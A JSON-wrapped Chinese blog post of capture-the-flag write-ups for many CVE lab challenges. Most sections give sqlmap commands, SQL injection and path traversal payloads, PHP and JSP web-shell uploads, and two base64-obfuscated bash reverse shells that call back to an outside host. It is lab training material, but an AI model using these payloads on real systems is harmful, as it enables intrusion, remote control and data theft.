{"id":2168,"date":"2023-08-26T00:18:48","date_gmt":"2023-08-25T16:18:48","guid":{"rendered":"https:\/\/fushuling.com\/?p=2168"},"modified":"2024-03-06T10:51:58","modified_gmt":"2024-03-06T02:51:58","slug":"%e6%98%a5%e7%a7%8b%e4%ba%91%e9%95%9c%c2%b7cve","status":"publish","type":"post","link":"https:\/\/fushuling.com\/index.php\/2023\/08\/26\/%e6%98%a5%e7%a7%8b%e4%ba%91%e9%95%9c%c2%b7cve\/","title":{"rendered":"\u6625\u79cb\u4e91\u5883\u00b7CVE"},"content":{"rendered":"\n

\u6bcf\u5929\u4e0a\u53bb\u7b7e\u5230\u7136\u540e\u987a\u4fbf\u505a\u4e00\u9053<\/p>\n\n\n\n

CVE-2022-32991<\/h2>\n\n\n\n

Web Based Quiz System SQL\u6ce8\u5165<\/p>\n\n\n\n

\u4e00\u628a\u68ad\u5c31\u884c\u4e86<\/p>\n\n\n\n

sqlmap -u 'http:\/\/eci-2ze05gfvp4qck2p94abx.cloudeci1.ichunqiu.com\/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34' -D ctf -T flag -C flag --dump<\/code><\/pre>\n\n\n\n
CVE-2022-28525<\/h2>\n\n\n\n
ED01CMSv20180505\u5b58\u5728\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e<\/p>\n\n\n\n
admin:admin\u767b\u5f55\u8fdb\u540e\u53f0\uff0c\u4e0a\u4f20\u5934\u50cf\u90a3\u513f\u4f20\u9a6c\u5c31\u884c\u4e86<\/p>\n\n\n\n
CVE-2022-28512<\/h2>\n\n\n\n
Fantastic Blog (CMS) SQL\u6ce8\u5165<\/p>\n\n\n\n
sqlmap -u \"http:\/\/eci-2zeeyy54s6gck8iiqmkv.cloudeci1.ichunqiu.com\/single.php?id=1\" --dump<\/code><\/pre>\n\n\n\n
CVE-2022-30887<\/h2>\n\n\n\n
Pharmacy Management System shell upload<\/p>\n\n\n\n
POST \/php_action\/editProductImage.php?id=1 HTTP\/1.1\nHost: eci-2ze1bzr6paa77ei5baaa.cloudeci1.ichunqiu.com\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/107.0.0.0 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: multipart\/form-data; boundary=---------------------------208935235035266125502673738631\nContent-Length: 481\nConnection: close\nCookie: PHPSESSID=d2hvmuiicg9o9jl78hc2mkneel\nUpgrade-Insecure-Requests: 1\n\n-----------------------------208935235035266125502673738631\nContent-Disposition: form-data; name=\"old_image\"\n\n\n-----------------------------208935235035266125502673738631\nContent-Disposition: form-data; name=\"productImage\"; filename=\"test.php\"\nContent-Type: image\/jpeg\n\n<?php\n\tsystem($_GET[1]);\n?>\n-----------------------------208935235035266125502673738631\nContent-Disposition: form-data; name=\"btn\"\n\n\n-----------------------------208935235035266125502673738631--<\/code><\/pre>\n\n\n\n
http://eci-2ze1bzr6paa77ei5baaa.cloudeci1.ichunqiu.com\/assets\/myimages\/test.php?1=cat%20\/flag<\/code><\/pre>\n\n\n\n
CVE-2022-25488<\/h2>\n\n\n\n
\u8bf7\u6c42\u5305\uff1a<\/p>\n\n\n\n
POST \/admin\/login.php HTTP\/1.1\nHost: eci-2ze60g2dh4p0k6k3vn22.cloudeci1.ichunqiu.com\nContent-Length: 39\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http:\/\/eci-2ze60g2dh4p0k6k3vn22.cloudeci1.ichunqiu.com\nContent-Type: application\/x-www-form-urlencoded\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/116.0.0.0 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.7\nReferer: http:\/\/eci-2ze60g2dh4p0k6k3vn22.cloudeci1.ichunqiu.com\/admin\/login.php\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\nCookie: PHPSESSID=kmd6celg1ju5g3p74l1j231t9m\nConnection: close\n\nemail=admin%40admin.com&password=wqewqe<\/code><\/pre>\n\n\n\n
sqlmap -r 1.txt <\/code><\/pre>\n\n\n\n
\u8dd1\u51fa\u6765email\u53c2\u6570\u6709\u95ee\u9898\uff1a<\/p>\n\n\n\n
POST parameter 'email' is vulnerable. Do you want to keep testing the others<\/code><\/pre>\n\n\n\n
sqlmap -r 1.txt --file-read \"\/flag\" --dbms mysql<\/code><\/pre>\n\n\n\n
CVE-2022-25578<\/h2>\n\n\n\n
\u8bbf\u95ee\/admin\uff0cadmin:tao\u767b\u5f55\u540e\u53f0\uff0c\u5728\u6587\u4ef6\u7ba1\u7406\u90a3\u91cc\u9009\u4e00\u4e2aphp\u6587\u4ef6\u7136\u540e\u7f16\u8f91\u5373\u53efrce<\/p>\n\n\n\n
CVE-2022-23880<\/h2>\n\n\n\n
\u548c\u4e0a\u9898\u4e00\u6837\uff0c\u80fd\u540c\u6837rce\uff0c\u4e0d\u8fc7\u8bf4\u7684\u4e0a\u4f20\u4e5f\u770b\u770b\uff0c\u770b\u4e86\u4e00\u4e0b\u5c31\u662f\u6587\u4ef6\u7ba1\u7406\u90a3\u4e2a\u9875\u9762\u4e0a\u9762\u53ef\u4ee5\u65b0\u5efa\u6587\u4ef6\uff0c\u90a3\u4f60\u5efa\u4e2a\u9a6c\u5373\u53efrce<\/p>\n\n\n\n
CVE-2022-23906<\/h2>\n\n\n\n
\/admin\/login.php admin:123456 \u767b\u5f55<\/p>\n\n\n\n
\u6587\u4ef6\u7ba1\u7406\u90a3\u91cccopy\u529f\u80fd\u80fd\u968f\u4fbf\u6539\u6587\u4ef6\u540d\uff0c\u57281.png\u91cc\u5199\u9a6c\uff0c\u4f20\u4e2a1.png\u6539\u62101.php\u5373\u53ef<\/p>\n\n\n\n
CVE-2022-24124<\/h2>\n\n\n\n
\u53c2\u8003https:\/\/blog.csdn.net\/giaogiaogioao\/article\/details\/128053328#comments_24414057<\/p>\n\n\n\n
\/api\/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=(select 1 from (select count(*), concat((select concat(',',id,flag) from casdoor.flag limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)<\/code><\/pre>\n\n\n\n
CVE-2022-23316<\/h2>\n\n\n\n
\/admin<\/code><\/pre>\n\n\n\n
admin::tao\u767b\u5f55\uff0c\u6587\u4ef6\u7ba1\u7406\u90a3\u91cc\u8f93\u5165..\/..\/..\/..\/\u76ee\u5f55\u7a7f\u8d8a\u5230\u6839\u76ee\u5f55\uff0c\u5373\u53ef\u83b7\u53d6flag<\/p>\n\n\n\n
CVE-2022-25401<\/h2>\n\n\n\n
Cuppa CMS 1.0\u4e2dadministrator\/templates\/default\/html\/windows\/right.php\u6587\u4ef6\u7ba1\u7406\u5668\u5f97\u590d\u5236\u529f\u80fd\u5141\u8bb8\u5c06\u4efb\u4f55\u6587\u4ef6\u590d\u5236\u5230\u5f53\u524d\u76ee\u5f55\uff0c\u4ece\u800c\u6388\u4e88\u653b\u51fb\u8005\u5bf9\u4efb\u610f\u6587\u4ef6\u5f97\u8bfb\u53d6\u6743\u9650<\/p>\n\n\n\n
POST \/templates\/default\/html\/windows\/right.php HTTP\/1.1\nHost: eci-2zeix4tsyrfzjx6lipbv.cloudeci1.ichunqiu.com\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko\/20100101 Firefox\/116.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 124\nOrigin: http:\/\/eci-2zeix4tsyrfzjx6lipbv.cloudeci1.ichunqiu.com\nConnection: close\nReferer: http:\/\/eci-2zeix4tsyrfzjx6lipbv.cloudeci1.ichunqiu.com\/templates\/default\/html\/windows\/right.php\nCookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1695134409,1695176527,1695211421,1695280015; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1695280015; country=us; language=en; PHPSESSID=orp55ik7ovdgtoaibc0ea60pe5; administrator_path=http%3A%2F%2Feci-2zeix4tsyrfzjx6lipbv.cloudeci1.ichunqiu.com%2F\nUpgrade-Insecure-Requests: 1\n\nid=1&path=component%2Ftable_manager%2Fview%2Fcu_views&uniqueClass=window_right_246232&url=..%2F..%2F..%2F..%2F..%2F..%2Fflag<\/code><\/pre>\n\n\n\n
CVE-2022-25099<\/h2>\n\n\n\n
CVE-2022-25099<\/a> \u5bf9\u7740\u6284\u5c31\u884c\u4e86\uff0c\u5927\u6982\u5c31\u662fadmin 123456\u767b\u5f55\u540e\u53f0\uff0c\u7136\u540e\u5728add-ons\uff0cinstall language\u90a3\u91cc\u4f20\u4e00\u4e2a\u9a6c\u4e0a\u53bb\u5c31\u884c\u4e86<\/p>\n\n\n\n
CVE-2022-24663<\/h2>\n\n\n\n
wordpress\u5c0ftrick\uff0cwordpress\u6709\u4e00\u4e2a\u6cc4\u9732\u7528\u6237\u4fe1\u606f\u7684\u63a5\u53e3\uff1a<\/p>\n\n\n\n
http://eci-2ze2c4nntukyr3izj5bz.cloudeci1.ichunqiu.com\/index.php\/wp-json\/wp\/v2\/users\/?per_page=100&page=1<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u597d\u7684\u6ca1\u6cc4\u9732\u51fa\u6765\uff0c\u770b\u4e86\u4e0b\u522b\u4eba\u7684wp\uff0c\u8d26\u53f7\u5bc6\u7801\u662ftest::test<\/p>\n\n\n\n
\u540e\u53f0\u624b\u6539html<\/p>\n\n\n\n
 <form\n      action=\"http:\/\/eci-2ze2c4nntukyr3izj5bz.cloudeci1.ichunqiu.com\/wp-admin\/admin-ajax.php\"\n      method=\"post\"\n    >\n      <input name=\"action\" value=\"parse-media-shortcode\" \/>\n      <textarea name=\"shortcode\">\n[php_everywhere] <?php file_put_contents(\"\/var\/www\/html\/fuck.php\", base64_decode(\"PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTsgPz4=\")); ?>[\/php_everywhere]<\/textarea\n      >\n      <input type=\"submit\" value=\"Execute\" \/>\n    <\/form><\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u70b9\u51fb\u65b0\u751f\u6210execute<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u7136\u540erce\u5373\u53ef<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
CVE-2022-21661<\/h2>\n\n\n\n
2022\u5e741\u67086\u65e5\uff0cwordpress\u53d1\u5e03\u4e865.8.3\u7248\u672c\uff0c\u4fee\u590d\u4e86\u4e00\u5904\u6838\u5fc3\u4ee3\u7801WP_Query\u7684sql\u6ce8\u5165\u6f0f\u6d1e\u3002WP_Query\u662fwordpress\u5b9a\u4e49\u7684\u4e00\u4e2a\u7c7b\uff0c\u5141\u8bb8\u5f00\u53d1\u8005\u7f16\u5199\u81ea\u5b9a\u4e49\u67e5\u8be2\u548c\u4f7f\u7528\u4e0d\u540c\u7684\u53c2\u6570\u5c55\u793a\u6587\u7ae0\uff0c\u5e76\u53ef\u4ee5\u76f4\u63a5\u67e5\u8be2wordpress\u6570\u636e\u5e93\uff0c\u5728\u6838\u5fc3\u6846\u67b6\u548c\u63d2\u4ef6\u4ee5\u53ca\u4e3b\u9898\u4e2d\u5e7f\u6cdb\u4f7f\u7528\u3002\u6e90\u7801\u4f4d\u7f6e\uff1awww.tar<\/p>\n\n\n\n
POST<\/p>\n\n\n\n
action=test&data={\"tax_query\":{\"0\":{\"field\":\"term_taxonomy_id\",\"terms\":[\"111) and extractvalue(rand(),concat(0x5e,substr(load_file('\/flag'),1,25),0x5e))#\"]}}}\naction=test&data={\"tax_query\":{\"0\":{\"field\":\"term_taxonomy_id\",\"terms\":[\"111) and extractvalue(rand(),concat(0x5e,substr(load_file('\/flag'),25,25),0x5e))#\"]}}}<\/code><\/pre>\n\n\n\n
CVE-2021-44983<\/h2>\n\n\n\n
taocms 3.0.1 \u767b\u9646\u540e\u53f0\u540e\u6587\u4ef6\u7ba1\u7406\u5904\u5b58\u5728\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e<\/p>\n\n\n\n
..\/..\/..\/..\/flag<\/p>\n\n\n\n
CVE-2021-41402<\/h2>\n\n\n\n
admin 12345678<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u4f20\u4e2a\u4e00\u53e5\u8bdd\u6728\u9a6c<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
CVE-2022-23134<\/h2>\n\n\n\n
Admin\/zabbix<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
CVE-2022-24112<\/h2>\n\n\n\n
https://github.com\/twseptian\/cve-2022-24112\/blob\/main\/poc\/poc2.py<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
CVE-2015-1427<\/h2>\n\n\n\n
ElasticSearch RCE<\/p>\n\n\n\n
POST \/website\/blog\/ HTTP\/1.1\nHost: eci-2ze3i5ijyfqu1hcjacxf.cloudeci1.ichunqiu.com:9200\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko\/20100101 Firefox\/86.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,\/;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nConnection: close\nCookie: UM_distinctid=1785a4ff130456-0f22e64e92af97-4c3f227c-1fa400-1785a4ff131385; qSq_sid=TwroyT; qSq_visitedfid=2\nUpgrade-Insecure-Requests: 1\nCache-Control: max-age=0\nContent-Type: application\/text\nContent-Length: 20\n\n{\n\"name\": \"test\"\n}<\/code><\/pre>\n\n\n\n
POST \/_search?pretty HTTP\/1.1\nHost: eci-2ze3i5ijyfqu1hcjacxf.cloudeci1.ichunqiu.com:9200\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko\/20100101 Firefox\/86.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,\/;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nConnection: close\nCookie: UM_distinctid=1785a4ff130456-0f22e64e92af97-4c3f227c-1fa400-1785a4ff131385; qSq_sid=TwroyT; qSq_visitedfid=2\nUpgrade-Insecure-Requests: 1\nCache-Control: max-age=0\nContent-Type: application\/text\nContent-Length: 156\n\n{\"size\":1, \"script_fields\": {\"lupin\":{\"lang\":\"groovy\",\"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"cat \/flag\\\").getText()\"}}}<\/code><\/pre>\n\n\n\n
\u5947\u602a\uff0cflag\u600e\u4e48\u6700\u540ebase64\u4e86\u4e00\u4e0b<\/p>\n\n\n\n
CVE-2022-29464<\/h2>\n\n\n\n
WSO2\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\uff08CVE-2022-29464\uff09\u662fOrange Tsai\u53d1\u73b0\u7684WSO2\u4e0a\u7684\u4e25\u91cd\u6f0f\u6d1e\u3002\u8be5\u6f0f\u6d1e\u662f\u4e00\u79cd\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u65e0\u9650\u5236\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\uff0c\u5141\u8bb8\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u653b\u51fb\u8005\u901a\u8fc7\u4e0a\u4f20\u6076\u610fJSP\u6587\u4ef6\u5728WSO2\u670d\u52a1\u5668\u4e0a\u83b7\u5f97RCE\u3002<\/p>\n\n\n\n
POST \/fileupload\/toolsAny HTTP\/1.1\nHost:eci-2ze6yrlpw86x3ba8pnnm.cloudeci1.ichunqiu.com\nAccept: *\/*\nAccept-Encoding: gzip, deflate\nContent-Length: 903\nContent-Type: multipart\/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0\nUser-Agent: python-requests\/2.22.0\n\n\n--4ef9f369a86bfaadf5ec3177278d49c0\nContent-Disposition: form-data; name=\"..\/..\/..\/..\/repository\/deployment\/server\/webapps\/authenticationendpoint\/1.jsp\";filename=\"..\/..\/..\/..\/repository\/deployment\/server\/webapps\/authenticationendpoint\/1.jsp\"\n\n<FORM>\n    <INPUT name='cmd' type=text>\n    <INPUT type=submit value='Run'>\n<\/FORM>\n<%@ page import=\"java.io.*\" %>\n    <%\n    String cmd = request.getParameter(\"cmd\");\n    String output = \"\";\n    if(cmd != null) { \n   \n        String s = null;\n        try { \n   \n            Process p = Runtime.getRuntime().exec(cmd,null,null);\n            BufferedReader sI = new BufferedReader(new\nInputStreamReader(p.getInputStream()));\n            while((s = sI.readLine()) != null) { \n    output += s+\"<\/br>\"; }\n        }  catch(IOException e) { \n      e.printStackTrace();   }\n    }\n%>\n        <%=output %>\n--4ef9f369a86bfaadf5ec3177278d49c0--<\/code><\/pre>\n\n\n\n
https://eci-2ze6yrlpw86x3ba8pnnm.cloudeci1.ichunqiu.com:9443\/authenticationendpoint\/1.jsp?cmd=cat%20\/flag<\/code><\/pre>\n\n\n\n
CVE-2022-22965<\/h2>\n\n\n\n
https:\/\/meizjm3i.github.io<\/a><\/p>\n\n\n\n
https:\/\/github.com\/reznok\/Spring4Shell-POC<\/a><\/p>\n\n\n\n
CVE-2022-22963<\/h2>\n\n\n\n
POST \/functionRouter HTTP\/1.1\nHost: 39.106.48.123:32818\nspring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec(\"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94eC54eC54eC54eC85MzgzIDA+JjE=}|{base64,-d}|{bash,-i}\")\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko\/20100101 Firefox\/116.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Length: 9\nContent-Type: application\/x-www-form-urlencoded\n\nfushuling<\/code><\/pre>\n\n\n\n
CVE-2022-24263<\/h2>\n\n\n\n
POST \/func1.php HTTP\/1.1\nHost: eci-2ze7jtu1e1qt01pr3qo9.cloudeci1.ichunqiu.com\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko\/20100101 Firefox\/116.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 41\nOrigin: http:\/\/eci-2ze7jtu1e1qt01pr3qo9.cloudeci1.ichunqiu.com\nConnection: close\nReferer: http:\/\/eci-2ze7jtu1e1qt01pr3qo9.cloudeci1.ichunqiu.com\/\nCookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1707135339,1707227791,1707307697,1707396830; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1707397094\nUpgrade-Insecure-Requests: 1\n\nusername3=qqq&password3=qqq&docsub1=Login<\/code><\/pre>\n\n\n\n
python sqlmap.py -r 11.txt -D ctf -T flag -C flag --dump<\/code><\/pre>\n\n\n\n
CVE-2022-33980<\/h2>\n\n\n\n
1.xml<\/code><\/pre>\n\n\n\n
<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\n<configuration>\n        <path>${script:js:java.lang.Runtime.getRuntime().exec(\"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94eHh4LzkzODMgMD4mMQ==}|{base64,-d}|{bash,-i}\")}<\/path>\n<\/configuration><\/code><\/pre>\n\n\n\n
http://eci-2ze52bz71i3jhs3o8ooj.cloudeci1.ichunqiu.com\/Url?url=http:\/\/vps\/1.xml&data=path<\/code><\/pre>\n\n\n\n
CVE-2022-25487<\/h2>\n\n\n\n
POST \/admin\/uploads.php?id=1 HTTP\/1.1\nHost: eci-2zeddauz52vhveeeho54.cloudeci1.ichunqiu.com\nContent-Type: multipart\/form-data; boundary=---------------------------30623082103363803402542706041\nContent-Length: 352\nConnection: close\n\n-----------------------------30623082103363803402542706041\nContent-Disposition: form-data; name=\"file\"\n\n\n-----------------------------30623082103363803402542706041\nContent-Disposition: form-data; name=\"file\"; filename=\"1.php\"\nContent-Type: image\/jpeg\n\n\n<?php system(\"cat \/f*\");?>\n-----------------------------30623082103363803402542706041--\n<\/code><\/pre>\n\n\n\n
CVE-2018-12530<\/h2>\n\n\n\n
http:\/\/eci-2ze7worqqxgqb3wk923f.cloudeci1.ichunqiu.com\/admin\/\u8df3\u8f6c\u7ba1\u7406\u5458\u540e\u53f0\uff0c\u7528\u6237\u540dadmin\uff0c\u5bc6\u7801f2xWcke5KN6pfebu(\u9898\u5e72\u7ed9\u7684)<\/p>\n\n\n\n
\u540e\u53f0\u53ef\u4ee5\u4efb\u610f\u6587\u4ef6\u5220\u9664\uff0c\u6211\u4eec\u9009\u62e9\u5220\u9664\u5b89\u88c5\u9501\u91cd\u56de\u5b89\u88c5\u6a21\u5f0f\uff0c<\/p>\n\n\n\n
\/admin\/app\/batch\/csvup.php?fileField=test-1&flienamecsv=..\/..\/..\/config\/install.lock<\/code><\/pre>\n\n\n\n
\u5b89\u88c5\u9875\uff1ahttp:\/\/eci-2ze7worqqxgqb3wk923f.cloudeci1.ichunqiu.com\/install\/index.php<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u8fd9\u91cc\u6709\u4e2a\u6709\u8da3\u7684\u70b9\uff0c\u6570\u636e\u5e93\u5bc6\u7801\u8fd9\u91cc\u53ef\u4ee5\u76f4\u63a5\u8f93\u5165\u60f3\u6267\u884c\u7684\u4ee3\u7801\uff0c\u56e0\u4e3a\u540e\u53f0\u7684\u903b\u8f91\u5bf9\u8fd9\u91cc\u662f\u8fd9\u4e48\u5904\u7406\u7684\uff1a<\/p>\n\n\n\n
$db_username=trim($db__username);\n$db_pass=trim($db_pass);\n$db_name=trim($db_name);\n$db_port = trim($db_port);\n$config=\"<?php\n\/*\ncon_db_host = \\ \"$db_host\\ \"\ncon_db_port = \\ \"$db_port\\ \"\ncon_db_id= \\ \"$db__username \\ \"\ncon_db_pass = \\ \"$db_pass \\ \"\ncon_db_name = \\ \"$db_name \\ \"\ntablepre=\\ \"$db_prefix \\ \"\ndb_charset =\\ \"utf8\\ \";\n*\/\n?>\";\n$fp=fopen(\"..\/config\/config_db.php\",'w+');\nfputs($fp, $config);\nfclose($fp);<\/code><\/pre>\n\n\n\n
\u53ef\u4ee5\u8bf4\u5bf9\u8f93\u5165\u7684\u5b57\u7b26\u4e32\u6ca1\u6709\u4efb\u4f55\u8fc7\u6ee4\uff0c\u76f4\u63a5\u5199\u8fdb\u53bb\u4e86\uff0c\u6240\u4ee5\u6309\u7167\u5e38\u89c4\u601d\u8def\u5199\u9a6c\u5373\u53ef\uff0c\u6bd4\u5982\u6570\u636e\u5e93\u5bc6\u7801\u90a3\u91cc\u8f93\u5165<\/p>\n\n\n\n
*\/assert($_REQUEST[1])\/*<\/code><\/pre>\n\n\n\n
\u8fd9\u6837\u6700\u540e\u5199\u5165\u7684\u5c31\u662f<\/p>\n\n\n\n
<?php\n     \/*\n       con_db_host = \"localhost\"\n       con_db_port = \"3306\"\n       con_db_id   = \"root\"\n       con_db_pass    = \"*\/assert($_REQUEST[1])\/*\"\n       con_db_name = \"metinfo\"\n       tablepre    =  \"met_\"\n       db_charset  =  \"utf8\";\n      *\/\n?><\/code><\/pre>\n\n\n\n
\u8bbf\u95eeurl\/config\/config_db.php?1=system(“cat \/flag”);\u76f4\u63a5\u62ffflag\u4e86<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u6211\u539f\u6765\u9047\u5230\u8fc7\u4e00\u4e2a\u7c7b\u4f3c\u7684\u60c5\u51b5\uff0c\u4f46\u662f\u5f53\u65f6\u90a3\u4e2acms\u540e\u53f0\u662f\u8fd9\u4e48\u5199\u7684<\/p>\n\n\n\n
$content = '<?'.\"php\\n\";\n    $content .= \"\\$dbhost   = \\\"$dbhost\\\";\\n\\n\";\n    $content .= \"\\$dbname   = \\\"$dbname\\\";\\n\\n\";\n    $content .= \"\\$dbuser   = \\\"$dbuser\\\";\\n\\n\";\n    $content .= \"\\$dbpass   = \\\"$dbpass\\\";\\n\\n\";\n    $content .= \"\\$pre    = \\\"$pre\\\";\\n\\n\";\n\t$content .= \"\\$cookiedomain = '';\\n\\n\";\n\t$content .= \"\\$cookiepath = '\/';\\n\\n\";\n    $content .= \"define('BLUE_CHARSET','\".BLUE_CHARSET.\"');\\n\\n\";\n    $content .= \"define('BLUE_VERSION','\".BLUE_VERSION.\"');\\n\\n\";\n    $content .= '?>';<\/code><\/pre>\n\n\n\n
\u770b\u8d77\u6765\u7528\u7c7b\u4f3cblue_\";phpinfo();#<\/code>\u7684poc\u5c31\u53ef\u4ee5\u4e86\uff0c\u6784\u9020$content .= \"\\$dbname   = \\\"blue_\";phpinfo();#\\\";\\n\\n\";<\/code>\uff0c\u4f46\u5f53\u65f6\u90a3\u4e2acms\u5168\u5c40\u914d\u7f6e\u91cc\u5bf9\u53cc\u5f15\u53f7\u8fdb\u884c\u4e86\u8f6c\u4e49\uff0c\u4e0d\u80fd\u4f7f\u7528\u53cc\u5f15\u53f7\u8fdb\u884c\u95ed\u5408\uff0c\u6700\u540e\u60f3\u5230\u7684\u529e\u6cd5\u662f\u7528${@phpinfo()}<\/code><\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
CVE-2019-13396<\/h2>\n\n\n\n
POST \/system-handle-form-submit HTTP\/1.1\nHost: eci-2zed8d7zvmknuxvxnds4.cloudeci1.ichunqiu.com\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko\/20100101 Firefox\/116.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 243\nOrigin: http:\/\/eci-2zed8d7zvmknuxvxnds4.cloudeci1.ichunqiu.com\nConnection: close\nReferer: http:\/\/eci-2zed8d7zvmknuxvxnds4.cloudeci1.ichunqiu.com\/login\nCookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1707581111,1708704994,1708785576,1708874004; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1708874004; PHPSESSID=96pb8o2ukfur00gdpbglp7nbb5\nUpgrade-Insecure-Requests: 1\n\ncallback=system_login_form&form_token=bc9ff941b7ec780bd765dbdb88292c15&form_type=&form_path=login&form_include=..\/..\/..\/..\/..\/flag&default_redirect_path=login&default_redirect_query=&current_student_id=&user=admin&password=123&btn_submit=Login<\/code><\/pre>\n\n\n\n
CVE-2024-0195<\/h2>\n\n\n\n
\u670d\u52a1\u5668\u6e90\u7801\u91cc\u5b58\u5728\u4e00\u4e2a\u6267\u884cjs\u4ee3\u7801\u7684\u529f\u80fd<\/p>\n\n\n\n
  public static void validScript(String functionName,String parameters,String script) throws Exception {\r\n        new ScriptEngineManager().getEngineByName(\"nashorn\").eval(concatScript(functionName,parameters,script));\r\n    }<\/code><\/pre>\n\n\n\n
\u5f88\u660e\u663e\uff0c\u5c31\u662f\u4e09\u4e2a\u53c2\u6570\uff0c\u65b9\u6cd5\u540d\uff0c\u4f20\u53c2\u548c\u5177\u4f53\u4ee3\u7801\uff0c\u5e76\u4e14\u6ca1\u6709\u8fc7\u6ee4\uff0c\u6240\u4ee5\u53ef\u4ee5\u6267\u884c\u6211\u4eec\u4f20\u5165\u7684script<\/p>\n\n\n\n
 private static String concatScript(String functionName,String parameters,String script){\r\n        StringBuffer scriptBuffer = new StringBuffer();\r\n        scriptBuffer.append(\"function \")\r\n                .append(functionName)\r\n                .append(\"(\")\r\n                .append(parameters == null ? \"\" : parameters)\r\n                .append(\"){\")\r\n                .append(script)\r\n                .append(\"}\");\r\n        return scriptBuffer.toString();\r\n    }<\/code><\/pre>\n\n\n\n
\u8fd9\u4e2a\u6e90\u7801\u6700\u540e\u6784\u9020\u7684\u51fd\u6570\u662f<\/p>\n\n\n\n
function functionName(parameters){script}<\/code><\/pre>\n\n\n\n
